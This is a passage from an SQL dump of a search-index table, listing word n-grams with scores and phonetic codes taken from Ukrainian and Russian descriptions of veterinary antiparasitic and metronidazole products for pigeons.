11,43',0,1,1.7333,'м000',1,'*'),(1548348,'мг фенбендазолу','мг фенбендазолу',0,1,1.5,'м000',1,'*'),(1548349,'мг фенбендазолу фармакологічні','мг фенбендазолу фармакологічні',0,1,2,'м000',1,'*'),(1548350,'медицині виробник пп','медицині виробник пп',0,1,1.6667,'м000',1,'*'),(1548351,'метою профілактики','метою профілактики',0,1,1.6,'м000',1,'*'),(1548352,'метою профілактики рекомендується','метою профілактики рекомендується',0,1,2,'м000',1,'*'),(1548353,'не вимагає','не вимагає',0,1,1.3333,'н000',1,'*'),(1548354,'не вимагає збiльшення','не вимагає збiльшення',0,1,1.7,'н000',1,'*'),(1548355,'не застосовувати виснаженої','не застосовувати виснаженої',0,1,1.9,'н000',1,'*'),(1548356,'нематод','нематод',0,0,0.4667,'н000',2,'*'),(1548357,'нематод та','нематод та',0,1,1.3333,'н000',1,'*'),(1548358,'нематод та цестод','нематод та цестод',0,1,1.5667,'н000',1,'*'),(1548359,'нематодозов','нематодозов',0,0,0.7333,'н000',1,'*'),(1548360,'нематодозов у','нематодозов у',0,1,1.4333,'н000',1,'*'),(1548361,'нематодозов у голубів','нематодозов у голубів',0,1,1.7,'н000',1,'*'),(1548362,'обробку','обробку',0,0,0.4667,'о000',1,'*'),(1548363,'обробку повторювати','обробку повторювати',0,1,1.6333,'о000',1,'*'),(1548364,'обробку повторювати кожні','обробку повторювати кожні',0,1,1.8333,'о000',1,'*'),(1548365,'одноразово','одноразово',0,0,0.6667,'о000',2,'*'),(1548366,'одноразово при','одноразово при',0,1,1.4667,'о000',1,'*'),(1548367,'одноразово при сильній','одноразово при сильній',0,1,1.7333,'о000',1,'*'),(1548368,'піперазином','піперазином',0,0,0.7333,'п000',1,'*'),(1548369,'піперазином холінергічних','піперазином холінергічних',0,1,1.8333,'п000',1,'*'),(1548370,'піперазином холінергічних препаратами','піперазином холінергічних препаратами',0,1,2,'п000',1,'*'),(1548371,'після їх','після їх',0,1,1.2667,'п000',1,'*'),(1548372,'після їх застосування','після їх застосування',0,1,1.7,'п000',1,'*'),(1548373,'пакети із','пакети із',0,1,1.3,'п000',1,'*'),(1548374,'пакети із фольги','пакети із фольги',0,1,1.5333,'п000',1,'*'),(1548375,'перорально індивідуально','перорально індивідуально',0,1,1.8,'п000',1,'*'),(1548376,'перорально індивідуально по','перорально індивідуально по',0,1,1.9,'п000',1,'*'),(1548377,'по 1 таблетці','по 1 таблетці',0,1,1.4333,'п000',1,'*'),(1548378,'по 50','по 50',0,1,1.1667,'п000',3,'*'),(1548379,'по 50 таблеток','по 50 таблеток',0,1,1.4667,'п000',1,'*'),(1548380,'повторювати','повторювати',0,0,0.7333,'п000',1,'*'),(1548381,'повторювати кожні','повторювати кожні',0,1,1.5667,'п000',1,'*'),(1548382,'повторювати кожні 4','повторювати кожні 4',0,1,1.6333,'п000',1,'*'),(1548383,'повторюють','повторюють',0,0,0.6667,'п000',1,'*'),(1548384,'повторюють через','повторюють через',0,1,1.5333,'п000',1,'*'),(1548385,'повторюють через 4-6','повторюють через 4-6',0,1,1.6667,'п000',1,'*'),(1548386,'празіквантелу','празіквантелу',0,0,0.8667,'п000',1,'*'),(1548387,'празіквантелу і','празіквантелу і',0,1,1.5,'п000',1,'*'),(1548388,'празіквантелу і фенбендазолу','празіквантелу і фенбендазолу',0,1,1.9333,'п000',1,'*'),(1548389,'празіквантелу та','празіквантелу та',0,1,1.5333,'п000',1,'*'),(1548390,'празіквантелу та фенбендазолу','празіквантелу та фенбендазолу',0,1,1.9667,'п000',1,'*'),(1548391,'празіфен','празіфен',0,0,0.5333,'п000',1,'*'),(1548392,'празіфен антигельмінтний','празіфен антигельмінтний',0,1,1.8,'п000',1,'*'),(1548393,'празіфен антигельмінтний препарат','празіфен антигельмінтний препарат',0,1,2,'п000',1,'*'),(1548394,'празіфен глистогінний','празіфен глистогінний',0,1,1.7,'п000',1,'*'),(1548395,'празіфен глистогінний препарат','празіфен глистогінний препарат',0,1,2,'п000',1,'*'),(1548396,'празиквантелу','празиквантелу',0,0,0.8667,'п000',1,'*'),(1548397,'празиквантелу 11,43','празиквантелу 11,43',0,1,1.6333,'п000',1,'*'),(1548398,'празиквантелу 11,43 мг','празиквантелу 11,43 мг',0,1,1.7333,'п000',1,'*'),(1548399,'препарат дія','препарат дія',0,1,1.4,'п000',1,'*'),(1548400,'препарат дія якого','препарат дія якого',0,1,1.6,'п000',1,'*'),(1548401,'препарат застосовують','препарат застосовують',0,1,1.7,'п000',1,'*'),(1548402,'препарат застосовують для','препарат застосовують для',0,1,1.8333,'п000',1,'*'),(1548403,'препарат застосовують перорально','препарат застосовують перорально',0,1,2,'п000',1,'*'),(1548404,'препаратами','препаратами',0,0,0.7333,'п000',1,'*'),(1548405,'препаратами фосфорорганічні','препаратами фосфорорганічні',0,1,1.9,'п000',1,'*'),(1548406,'препаратами фосфорорганічні інсектициди','препаратами фосфорорганічні інсектициди',0,1,2,'п000',1,'*'),(1548407,'препарату не','препарату не',0,1,1.4,'п000',1,'*'),(1548408,'препарату не вимагає','препарату не вимагає',0,1,1.6667,'п000',1,'*'),(1548409,'при змiшаних','при змiшаних',0,1,1.4,'п000',1,'*'),(1548410,'при змiшаних гельмiнтозах','при змiшаних гельмiнтозах',0,1,1.8333,'п000',1,'*'),(1548411,'при сильній','при сильній',0,1,1.3667,'п000',1,'*'),(1548412,'при сильній інвазії','при сильній інвазії',0,1,1.6333,'п000',1,'*'),(1548413,'придатності 2роки','придатності 2роки',0,1,1.5667,'п000',1,'*'),(1548414,'придатності 2роки для','придатності 2роки для',0,1,1.7,'п000',1,'*'),(1548415,'профілактики рекомендується','профілактики рекомендується',0,1,1.9,'п000',1,'*'),(1548416,'профілактики рекомендується обробку','профілактики рекомендується обробку',0,1,2,'п000',1,'*'),(1548417,'профілактики цестодозов','профілактики цестодозов',0,1,1.7667,'п000',1,'*'),(1548418,'профілактики цестодозов нематодозов','профілактики цестодозов нематодозов',0,1,2,'п000',1,'*'),(1548419,'птиці а','птиці а',0,1,1.2333,'п000',1,'*'),(1548420,'птиці а також','птиці а також',0,1,1.4333,'п000',1,'*'),(1548421,'рекомендується','рекомендується',0,0,0.9333,'р000',2,'*'),(1548422,'рекомендується обробку','рекомендується обробку',0,1,1.7333,'р000',1,'*'),(1548423,'рекомендується обробку повторювати','рекомендується обробку повторювати',0,1,2,'р000',1,'*'),(1548424,'робить','робить',0,0,0.4,'р000',1,'*'),(1548425,'робить дегельмiнтизацiю','робить дегельмiнтизацiю',0,1,1.7667,'р000',1,'*'),(1548426,'робить дегельмiнтизацiю більш','робить дегельмiнтизацiю більш',0,1,1.9667,'р000',1,'*'),(1548427,'розширює','розширює',0,0,0.5333,'р000',1,'*'),(1548428,'розширює дiапазон','розширює дiапазон',0,1,1.5667,'р000',1,'*'),(1548429,'розширює дiапазон антигельмінтної','розширює дiапазон антигельмінтної',0,1,2,'р000',1,'*'),(1548430,'сильній','сильній',0,0,0.4667,'с000',1,'*'),(1548431,'сильній інвазії','сильній інвазії',0,1,1.5,'с000',1,'*'),(1548432,'сильній інвазії лікування','сильній інвазії лікування',0,1,1.8333,'с000',1,'*'),(1548433,'сумiсна','сумiсна',0,0,0.4667,'с000',1,'*'),(1548434,'сумiсна дiя','сумiсна дiя',0,1,1.3667,'с000',1,'*'),(1548435,'сумiсна дiя празіквантелу','сумiсна дiя празіквантелу',0,1,1.8333,'с000',1,'*'),(1548436,'та фенбендазолу','та фенбендазолу',0,1,1.5,'т000',1,'*'),(1548437,'та фенбендазолу відносно','та фенбендазолу відносно',0,1,1.8,'т000',1,'*'),(1548438,'та цестод','та цестод',0,1,1.3,'т000',1,'*'),(1548439,'та цестод у','та цестод у',0,1,1.3667,'т000',1,'*'),(1548440,'таблетка','таблетка',0,0,0.5333,'т000',1,'*'),(1548441,'таблетка містить','таблетка містить',0,1,1.5333,'т000',1,'*'),(1548442,'таблетка містить 1,43','таблетка містить 1,43',0,1,1.7,'т000',1,'*'),(1548443,'таблеток','таблеток',0,0,0.5333,'т000',1,'*'),(1548444,'таблеток зберігання','таблеток зберігання',0,1,1.6333,'т000',1,'*'),(1548445,'таблеток зберігання сухе','таблеток зберігання сухе',0,1,1.8,'т000',1,'*'),(1548446,'таблетці','таблетці',0,0,0.5333,'т000',1,'*'),(1548447,'таблетці кожному','таблетці кожному',0,1,1.5333,'т000',1,'*'),(1548448,'таблетці кожному голубу','таблетці кожному голубу',0,1,1.7667,'т000',1,'*'),(1548449,'також з','також з',0,1,1.2333,'т000',1,'*'),(1548450,'також з піперазином','також з піперазином',0,1,1.6333,'т000',1,'*'),(1548451,'термін придатності 2роки','термін придатності 2роки',0,1,1.8,'т000',1,'*'),(1548452,'тижнів','тижнів',0,0,0.4,'т000',4,'*'),(1548453,'тижнів з','тижнів з',0,1,1.2667,'т000',1,'*'),(1548454,'тижнів з метою','тижнів з метою',0,1,1.4667,'т000',1,'*'),(1548455,'у голубів дозування','у голубів дозування',0,1,1.6333,'у000',1,'*'),(1548456,'у голубів сумiсна','у голубів сумiсна',0,1,1.5667,'у000',1,'*'),(1548457,'фармакологічні','фармакологічні',0,0,0.9333,'ф000',3,'*'),(1548458,'фармакологічні властивості','фармакологічні властивості',0,1,1.8667,'ф000',3,'*'),(1548459,'фармакологічні властивості празіфен','фармакологічні властивості празіфен',0,1,2,'ф000',1,'*'),(1548460,'фенбендазолу','фенбендазолу',0,0,0.8,'ф000',1,'*'),(1548461,'фенбендазолу відносно','фенбендазолу відносно',0,1,1.7,'ф000',1,'*'),(1548462,'фенбендазолу відносно нематод','фенбендазолу відносно нематод',0,1,1.9667,'ф000',1,'*'),(1548463,'фенбендазолу розширює','фенбендазолу розширює',0,1,1.7,'ф000',1,'*'),(1548464,'фенбендазолу розширює дiапазон','фенбендазолу розширює дiапазон',0,1,2,'ф000',1,'*'),(1548465,'фенбендазолу фармакологічні','фенбендазолу фармакологічні',0,1,1.9,'ф000',1,'*'),(1548466,'фенбендазолу фармакологічні властивості','фенбендазолу фармакологічні властивості',0,1,2,'ф000',1,'*'),(1548467,'фольги','фольги',0,0,0.4,'ф000',2,'*'),(1548468,'фольги по','фольги по',0,1,1.3,'ф000',2,'*'),(1548469,'фольги по 50','фольги по 50',0,1,1.4,'ф000',2,'*'),(1548470,'фосфорорганічні','фосфорорганічні',0,0,1,'ф000',1,'*'),(1548471,'фосфорорганічні інсектициди','фосфорорганічні інсектициди',0,1,1.9,'ф000',1,'*'),(1548472,'фосфорорганічні інсектициди антгельмінтіки','фосфорорганічні інсектициди антгельмінтіки',0,1,2,'ф000',1,'*'),(1548473,'холінергічних','холінергічних',0,0,0.8667,'х000',1,'*'),(1548474,'холінергічних препаратами','холінергічних препаратами',0,1,1.8333,'х000',1,'*'),(1548475,'холінергічних препаратами фосфорорганічні','холінергічних препаратами фосфорорганічні',0,1,2,'х000',1,'*'),(1548476,'цестод','цестод',0,0,0.4,'ц000',1,'*'),(1548477,'цестод у','цестод у',0,1,1.2667,'ц000',1,'*'),(1548478,'цестод у голубів','цестод у голубів',0,1,1.5333,'ц000',1,'*'),(1548479,'цестодозов','цестодозов',0,0,0.6667,'ц000',1,'*'),(1548480,'цестодозов нематодозов','цестодозов нематодозов',0,1,1.7333,'ц000',1,'*'),(1548481,'цестодозов нематодозов у','цестодозов нематодозов у',0,1,1.8,'ц000',1,'*'),(1548482,'через','через',0,0,0.3333,'ч000',4,'*'),(1548483,'через 4-6','через 4-6',0,1,1.3,'ч000',2,'*'),(1548484,'через 4-6 тижнів','через 4-6 тижнів',0,1,1.5333,'ч000',2,'*'),(1548485,'якого','якого',0,0,0.3333,'я000',1,'*'),(1548486,'якого зумовлена','якого зумовлена',0,1,1.5,'я000',1,'*'),(1548487,'якого зумовлена вмістом','якого зумовлена вмістом',0,1,1.7667,'я000',1,'*'),(1553831,'-25','-25',0,0,0.3,'',1,'*'),(1553832,'-25 г','-25 г',0,1,1.1667,'г000',1,'*'),(1553833,'-25 г препарата','-25 г препарата',0,1,1.5,'г000',1,'*'),(1553834,'0,02','0,02',0,0,0.4,'',1,'*'),(1553835,'0,02 10','0,02 10',0,1,1.2333,'',1,'*'),(1553836,'0,02 10 г','0,02 10 г',0,1,1.3,'г000',1,'*'),(1553837,'0,05','0,05',0,0,0.4,'',1,'*'),(1553838,'0,05 в','0,05 в',0,1,1.2,'в000',1,'*'),(1553839,'0,05 в расчете','0,05 в расчете',0,1,1.4667,'в000',1,'*'),(1553840,'0,06','0,06',0,0,0.4,'',1,'*'),(1553841,'0,06 30','0,06 30',0,1,1.2333,'',1,'*'),(1553842,'0,06 30 г','0,06 30 г',0,1,1.3,'г000',1,'*'),(1553843,'0,15','0,15',0,0,0.4,'',1,'*'),(1553844,'0,15 75','0,15 75',0,1,1.2333,'',1,'*'),(1553845,'0,15 75 г','0,15 75 г',0,1,1.3,'г000',1,'*'),(1553846,'10 г препарата','10 г препарата',0,1,1.4667,'г000',1,'*'),(1553847,'10 кг','10 кг',0,1,1.1667,'к000',2,'*'),(1553848,'10 кг корма','10 кг корма',0,1,1.3667,'к000',1,'*'),(1553849,'10 л','10 л',0,1,1.1333,'л000',1,'*'),(1553850,'10 л питьевой','10 л питьевой',0,1,1.4333,'л000',1,'*'),(1553851,'100 г','100 г',0,1,1.1667,'г000',3,'*'),(1553852,'100 г препарата','100 г препарата',0,1,1.5,'г000',1,'*'),(1553853,'100 г хранение','100 г хранение',0,1,1.4667,'г000',1,'*'),(1553854,'18 до','18 до',0,1,1.1667,'д000',1,'*'),(1553855,'18 до 25','18 до 25',0,1,1.2667,'д000',1,'*'),(1553856,'19','19',0,0,0.2,'',2,'*'),(1553857,'19 суток','19 суток',0,1,1.2667,'с000',1,'*'),(1553858,'19 суток противопоказания','19 суток противопоказания',0,1,1.8333,'с000',1,'*'),(1553859,'2 года','2 года',0,1,1.2,'г000',1,'*'),(1553860,'2 года для','2 года для',0,1,1.3333,'г000',1,'*'),(1553861,'20 dlya','20 dlya',0,1,1.2333,'D400',1,'*'),(1553862,'20 dlya golubiv','20 dlya golubiv',0,1,1.5,'D4241',1,'*'),(1553863,'20 для','20 для',0,1,1.2,'д000',1,'*'),(1553864,'20 для голубів','20 для голубів',0,1,1.4667,'д000',1,'*'),(1553865,'20,0','20,0',0,0,0.4,'',1,'*'),(1553866,'20,0 г','20,0 г',0,1,1.2,'г000',1,'*'),(1553867,'20,0 г вспомогательные','20,0 г вспомогательные',0,1,1.7333,'г000',1,'*'),(1553868,'21','21',0,0,0.2,'',6,'*'),(1553869,'21 58-260','21 58-260',0,1,1.3,'',1,'*'),(1553870,'21 58-260 bielawa','21 58-260 bielawa',0,1,1.5667,'B400',1,'*'),(1553871,'2462','2462',0,0,0.4,'',1,'*'),(1553872,'25 с срок','25 с срок',0,1,1.3,'с000',1,'*'),(1553873,'30 г препарата','30 г препарата',0,1,1.4667,'г000',1,'*'),(1553874,'5-нітрогруппа','5-нітрогруппа',0,0,0.8667,'н000',1,'*'),(1553875,'5-нітрогруппа метронидазола','5-нітрогруппа метронидазола',0,1,1.9,'н000',1,'*'),(1553876,'5-нітрогруппа метронидазола взаимодействует','5-нітрогруппа метронидазола взаимодействует',0,1,2,'н000',1,'*'),(1553877,'5-нитрогруппы','5-нитрогруппы',0,0,0.8667,'н000',1,'*'),(1553878,'5-нитрогруппы метронидазола','5-нитрогруппы метронидазола',0,1,1.9,'н000',1,'*'),(1553879,'5-нитрогруппы метронидазола внутриклеточными','5-нитрогруппы метронидазола внутриклеточными',0,1,2,'н000',1,'*'),(1553880,'5-нитроимидазола','5-нитроимидазола',0,0,1,'н000',1,'*'),(1553881,'5-нитроимидазола механизм','5-нитроимидазола механизм',0,1,1.8333,'н000',1,'*'),(1553882,'5-нитроимидазола механизм действия','5-нитроимидазола механизм действия',0,1,2,'н000',1,'*'),(1553883,'50 и','50 и',0,1,1.1333,'и000',1,'*'),(1553884,'50 и 100','50 и 100',0,1,1.2667,'и000',1,'*'),(1553885,'50 мг на','50 мг на',0,1,1.2667,'м000',1,'*'),(1553886,'58-260','58-260',0,0,0.6,'',1,'*'),(1553887,'58-260 bielawa','58-260 bielawa',0,1,1.4667,'B400',1,'*'),(1553888,'58-260 bielawa woj','58-260 bielawa woj',0,1,1.6,'B420',1,'*'),(1553889,'75 г','75 г',0,1,1.1333,'г000',1,'*'),(1553890,'75 г препарата','75 г препарата',0,1,1.4667,'г000',1,'*'),(1553891,'bacteroides','bacteroides',0,0,0.7333,'B23632',1,'*'),(1553892,'bacteroides distasonis','bacteroides distasonis',0,1,1.7333,'B23632323252',1,'*'),(1553893,'bacteroides distasonis bacteroides','bacteroides distasonis bacteroides',0,1,2,'B23632323252123632',1,'*'),(1553894,'bacteroides fragilis','bacteroides fragilis',0,1,1.6667,'B2363216242',1,'*'),(1553895,'bacteroides fragilis bacteroides','bacteroides fragilis bacteroides',0,1,2,'B2363216242123632',1,'*'),(1553896,'bacteroides ovatus','bacteroides ovatus',0,1,1.6,'B23632132',1,'*'),(1553897,'bacteroides ovatus bacteroides','bacteroides ovatus bacteroides',0,1,2,'B23632132123632',1,'*'),(1553898,'bacteroides thetaiotaomicron','bacteroides thetaiotaomicron',0,1,1.9333,'B2363235265',1,'*'),(1553899,'bacteroides thetaiotaomicron bacteroides','bacteroides thetaiotaomicron bacteroides',0,1,2,'B2363235265123632',1,'*'),(1553900,'bacteroides vulgatus','bacteroides vulgatus',0,1,1.6667,'B2363214232',1,'*'),(1553901,'bacteroides vulgatus fusobacterium','bacteroides vulgatus fusobacterium',0,1,2,'B23632142321212365',1,'*'),(1553902,'baderoides','baderoides',0,0,0.6667,'B3632',1,'*'),(1553903,'baderoides spp','baderoides spp',0,1,1.4667,'B36321',1,'*'),(1553904,'baderoides spp bacteroides','baderoides spp bacteroides',0,1,1.8667,'B3632123632',1,'*'),(1553905,'bielawa','bielawa',0,0,0.4667,'B400',1,'*'),(1553906,'bielawa woj','bielawa woj',0,1,1.3667,'B420',1,'*'),(1553907,'bielawa woj dolnośląskie','bielawa woj dolnośląskie',0,1,1.8,'B4234542',1,'*'),(1553908,'clostridium','clostridium',0,0,0.7333,'C423635',1,'*'),(1553909,'clostridium spp','clostridium spp',0,1,1.5,'C42363521',1,'*'),(1553910,'clostridium spp peptococcus','clostridium spp peptococcus',0,1,1.9,'C4236352132',1,'*'),(1553911,'distasonis','distasonis',0,0,0.6667,'D23252',1,'*'),(1553912,'distasonis bacteroides','distasonis bacteroides',0,1,1.7333,'D23252123632',1,'*'),(1553913,'distasonis bacteroides ovatus','distasonis bacteroides ovatus',0,1,1.9667,'D23252123632132',1,'*'),(1553914,'dolnośląskie','dolnośląskie',0,0,0.8,'D4542',1,'*'),(1553915,'dzierżoniowska','dzierżoniowska',0,0,0.9333,'D2652',1,'*'),(1553916,'dzierżoniowska 21','dzierżoniowska 21',0,1,1.5667,'D2652',1,'*'),(1553917,'dzierżoniowska 21 58-260','dzierżoniowska 21 58-260',0,1,1.8,'D2652',1,'*'),(1553918,'entamoeba','entamoeba',0,0,0.6,'E5351',1,'*'),(1553919,'entamoeba histolytica','entamoeba histolytica',0,1,1.7,'E535123432',1,'*'),(1553920,'entamoeba histolytica облигатных','entamoeba histolytica облигатных',0,1,2,'E535123432',1,'*'),(1553921,'eubacterium','eubacterium',0,0,0.7333,'E12365',1,'*'),(1553922,'eubacterium spp','eubacterium spp',0,1,1.5,'E1236521',1,'*'),(1553923,'eubacterium spp clostridium','eubacterium spp clostridium',0,1,1.9,'E12365212423635',1,'*'),(1553924,'fragilis','fragilis',0,0,0.5333,'F6242',1,'*'),(1553925,'fragilis bacteroides','fragilis bacteroides',0,1,1.6667,'F6242123632',1,'*'),(1553926,'fragilis bacteroides distasonis','fragilis bacteroides distasonis',0,1,2,'F6242123632323252',1,'*'),(1553927,'fusobacterium','fusobacterium',0,0,0.8667,'F212365',1,'*'),(1553928,'fusobacterium spp','fusobacterium spp',0,1,1.5667,'F21236521',1,'*'),(1553929,'fusobacterium spp veillonela','fusobacterium spp veillonela',0,1,1.9333,'F21236521454',1,'*'),(1553930,'gardnerella','gardnerella',0,0,0.7333,'G63564',1,'*'),(1553931,'gardnerella vaginalis','gardnerella vaginalis',0,1,1.7,'G6356412542',1,'*'),(1553932,'gardnerella vaginalis giardia','gardnerella vaginalis giardia',0,1,1.9667,'G635641254263',1,'*'),(1553933,'giardia','giardia',0,0,0.4667,'G630',1,'*'),(1553934,'giardia intestinalis','giardia intestinalis',0,1,1.6667,'G635323542',1,'*'),(1553935,'giardia intestinalis entamoeba','giardia intestinalis entamoeba',0,1,2,'G6353235425351',1,'*'),(1553936,'histolytica','histolytica',0,0,0.7333,'H23432',1,'*'),(1553937,'histolytica облигатных','histolytica облигатных',0,1,1.7333,'H23432',1,'*'),(1553938,'histolytica облигатных анаэробных','histolytica облигатных анаэробных',0,1,2,'H23432',1,'*'),(1553939,'intestinalis entamoeba','intestinalis entamoeba',0,1,1.7333,'I53235425351',1,'*'),(1553940,'intestinalis entamoeba histolytica','intestinalis entamoeba histolytica',0,1,2,'I5323542535123432',1,'*'),(1553941,'metronidazol','metronidazol',0,0,0.8,'M365324',1,'*'),(1553942,'metronidazol 20','metronidazol 20',0,1,1.5,'M365324',1,'*'),(1553943,'metronidazol 20 dlya','metronidazol 20 dlya',0,1,1.6667,'M36532434',1,'*'),(1553944,'o','o',0,0,0.0667,'O000',1,'*'),(1553945,'o o','o o',0,1,1.1,'O000',1,'*'),(1553946,'o o ul','o o ul',0,1,1.2,'O400',1,'*'),(1553947,'o ul','o ul',0,1,1.1333,'O400',1,'*'),(1553948,'o ul dzierżoniowska','o ul dzierżoniowska',0,1,1.6333,'O432652',1,'*'),(1553949,'ovatus','ovatus',0,0,0.4,'O132',1,'*'),(1553950,'ovatus bacteroides','ovatus bacteroides',0,1,1.6,'O132123632',1,'*'),(1553951,'ovatus bacteroides thetaiotaomicron','ovatus bacteroides thetaiotaomicron',0,1,2,'O13212363235265',1,'*'),(1553952,'peptococcus','peptococcus',0,0,0.7333,'P320',1,'*'),(1553953,'peptococcus spp','peptococcus spp',0,1,1.5,'P321',1,'*'),(1553954,'peptococcus spp peptostreptococcus','peptococcus spp peptostreptococcus',0,1,2,'P3213236132',1,'*'),(1553955,'peptostreptococcus','peptostreptococcus',0,0,1,'P3236132',1,'*'),(1553956,'peptostreptococcus spp','peptostreptococcus spp',0,1,1.7333,'P32361321',1,'*'),(1553957,'peptostreptococcus spp применение','peptostreptococcus spp применение',0,1,2,'P32361321',1,'*'),(1553958,'pfo','pfo',0,0,0.2,'P000',1,'*'),(1553959,'pfo vetos-farma','pfo vetos-farma',0,1,1.5,'P32165',1,'*'),(1553960,'pfo vetos-farma sp','pfo vetos-farma sp',0,1,1.6,'P3216521',1,'*'),(1553961,'sp','sp',0,0,0.1333,'S100',1,'*'),(1553962,'sp z','sp z',0,1,1.1333,'S120',1,'*'),(1553963,'sp z o','sp z o',0,1,1.2,'S120',1,'*'),(1553964,'spp bacteroides','spp bacteroides',0,1,1.5,'S123632',1,'*'),(1553965,'spp bacteroides fragilis','spp bacteroides fragilis',0,1,1.8,'S12363216242',1,'*'),(1553966,'spp clostridium','spp clostridium',0,1,1.5,'S12423635',1,'*'),(1553967,'spp clostridium spp','spp clostridium spp',0,1,1.6333,'S1242363521',1,'*'),(1553968,'spp peptococcus','spp peptococcus',0,1,1.5,'S132',1,'*'),(1553969,'spp peptococcus spp','spp peptococcus spp',0,1,1.6333,'S1321',1,'*'),(1553970,'spp peptostreptococcus','spp peptostreptococcus',0,1,1.7333,'S13236132',1,'*'),(1553971,'spp peptostreptococcus spp','spp peptostreptococcus spp',0,1,1.8667,'S132361321',1,'*'),(1553972,'spp veillonela','spp veillonela',0,1,1.4667,'S1454',1,'*'),(1553973,'spp veillonela spp','spp veillonela spp',0,1,1.6,'S145421',1,'*'),(1553974,'spp некоторых','spp некоторых',0,1,1.4333,'S100',1,'*'),(1553975,'spp некоторых грамположительных','spp некоторых грамположительных',0,1,2,'S100',1,'*'),(1553976,'spp применение','spp применение',0,1,1.4667,'S100',1,'*'),(1553977,'spp применение лечения','spp применение лечения',0,1,1.7333,'S100',1,'*'),(1553978,'thetaiotaomicron','thetaiotaomicron',0,0,1,'T5265',1,'*'),(1553979,'thetaiotaomicron bacteroides','thetaiotaomicron bacteroides',0,1,1.9333,'T5265123632',1,'*'),(1553980,'thetaiotaomicron bacteroides vulgatus','thetaiotaomicron bacteroides vulgatus',0,1,2,'T526512363214232',1,'*'),(1553981,'trichomonas vaginalis','trichomonas vaginalis',0,1,1.7,'T625212542',1,'*'),(1553982,'trichomonas vaginalis gardnerella','trichomonas vaginalis gardnerella',0,1,2,'T62521254263564',1,'*'),(1553983,'ul','ul',0,0,0.1333,'U400',1,'*'),(1553984,'ul dzierżoniowska','ul dzierżoniowska',0,1,1.5667,'U432652',1,'*'),(1553985,'ul dzierżoniowska 21','ul dzierżoniowska 21',0,1,1.6667,'U432652',1,'*'),(1553986,'vaginalis','vaginalis',0,0,0.6,'V2542',1,'*'),(1553987,'vaginalis gardnerella','vaginalis gardnerella',0,1,1.7,'V254263564',1,'*'),(1553988,'vaginalis gardnerella vaginalis','vaginalis gardnerella vaginalis',0,1,2,'V25426356412542',1,'*'),(1553989,'vaginalis giardia','vaginalis giardia',0,1,1.5667,'V254263',1,'*'),(1553990,'vaginalis giardia intestinalis','vaginalis giardia intestinalis',0,1,2,'V2542635323542',1,'*'),(1553991,'veillonela','veillonela',0,0,0.6667,'V454',1,'*'),(1553992,'veillonela spp','veillonela spp',0,1,1.4667,'V45421',1,'*'),(1553993,'veillonela spp некоторых','veillonela spp некоторых',0,1,1.8,'V45421',1,'*'),(1553994,'vetos-farma','vetos-farma',0,0,0.7333,'V32165',1,'*'),(1553995,'vetos-farma sp','vetos-farma sp',0,1,1.4667,'V3216521',1,'*'),(1553996,'vetos-farma sp z','vetos-farma sp z',0,1,1.5333,'V32165212',1,'*'),(1553997,'vulgatus','vulgatus',0,0,0.5333,'V4232',1,'*'),(1553998,'vulgatus fusobacterium','vulgatus fusobacterium',0,1,1.7333,'V42321212365',1,'*'),(1553999,'vulgatus fusobacterium spp','vulgatus fusobacterium spp',0,1,1.8667,'V4232121236521',1,'*'),(1554000,'woj','woj',0,0,0.2,'W200',1,'*'),(1554001,'woj dolnośląskie','woj dolnośląskie',0,1,1.5333,'W234542',1,'*'),(1554002,'z','z',0,0,0.0667,'Z000',5,'*'),(1554003,'z o','z o',0,1,1.1,'Z000',1,'*'),(1554004,'z o o','z o o',0,1,1.1667,'Z000',1,'*'),(1554005,'інгибіруючи','інгибіруючи',0,0,0.7333,'і000',1,'*'),(1554006,'інгибіруючи синтез','інгибіруючи синтез',0,1,1.6,'і000',1,'*'),(1554007,'інгибіруючи синтез ее','інгибіруючи синтез ее',0,1,1.7,'і000',1,'*'),(1554008,'а лечебно','а лечебно',0,1,1.3,'а000',1,'*'),(1554009,'а лечебно раствор','а лечебно раствор',0,1,1.5667,'а000',1,'*'),(1554010,'алюминиевой','алюминиевой',0,0,0.7333,'а000',1,'*'),(1554011,'алюминиевой фольги','алюминиевой фольги',0,1,1.6,'а000',1,'*'),(1554012,'алюминиевой фольги по','алюминиевой фольги по',0,1,1.7,'а000',1,'*'),(1554013,'анаэробных','анаэробных',0,0,0.6667,'а000',1,'*'),(1554014,'анаэробных бактерий','анаэробных бактерий',0,1,1.6333,'а000',1,'*'),(1554015,'анаэробных бактерий baderoides','анаэробных бактерий baderoides',0,1,2,'а13632',1,'*'),(1554016,'анаэробных бактерий и','анаэробных бактерий и',0,1,1.7,'а000',1,'*'),(1554017,'ангидрид','ангидрид',0,0,0.5333,'а000',1,'*'),(1554018,'ангидрид лимонной','ангидрид лимонной',0,1,1.5667,'а000',1,'*'),(1554019,'ангидрид лимонной кислоты','ангидрид лимонной кислоты',0,1,1.8333,'а000',1,'*'),(1554020,'бактерий','бактерий',0,0,0.5333,'б000',1,'*'),(1554021,'бактерий baderoides','бактерий baderoides',0,1,1.6333,'б13632',1,'*'),(1554022,'бактерий baderoides spp','бактерий baderoides spp',0,1,1.7667,'б136321',1,'*'),(1554023,'бактерий eubacterium','бактерий eubacterium',0,1,1.6667,'б12365',1,'*'),(1554024,'бактерий eubacterium spp','бактерий eubacterium spp',0,1,1.8,'б1236521',1,'*'),(1554025,'бактерий и','бактерий и',0,1,1.3333,'б000',1,'*'),(1554026,'бактерий и простейших','бактерий и простейших',0,1,1.7,'б000',1,'*'),(1554027,'белый','белый',0,0,0.3333,'б000',1,'*'),(1554028,'белый или','белый или',0,1,1.3,'б000',1,'*'),(1554029,'белый или светло-желтый','белый или светло-желтый',0,1,1.7667,'б000',1,'*'),(1554030,'биохимическом','биохимическом',0,0,0.8667,'б000',1,'*'),(1554031,'биохимическом восстановлении','биохимическом восстановлении',0,1,1.9333,'б000',1,'*'),(1554032,'биохимическом восстановлении 5-нитрогруппы','биохимическом восстановлении 5-нитрогруппы',0,1,2,'б000',1,'*'),(1554033,'больных','больных',0,0,0.4667,'б000',1,'*'),(1554034,'больных трихомонадоз','больных трихомонадоз',0,1,1.6667,'б000',1,'*'),(1554035,'больных трихомонадоз вызванный','больных трихомонадоз вызванный',0,1,2,'б000',1,'*'),(1554036,'больше','больше',0,0,0.4,'б000',1,'*'),(1554037,'больше дозы','больше дозы',0,1,1.3667,'б000',1,'*'),(1554038,'больше дозы 0,15','больше дозы 0,15',0,1,1.5333,'б000',1,'*'),(1554039,'в 10','в 10',0,1,1.1333,'в000',1,'*'),(1554040,'в 10 л','в 10 л',0,1,1.2,'в000',1,'*'),(1554041,'в биохимическом','в биохимическом',0,1,1.5,'в000',1,'*'),(1554042,'в биохимическом 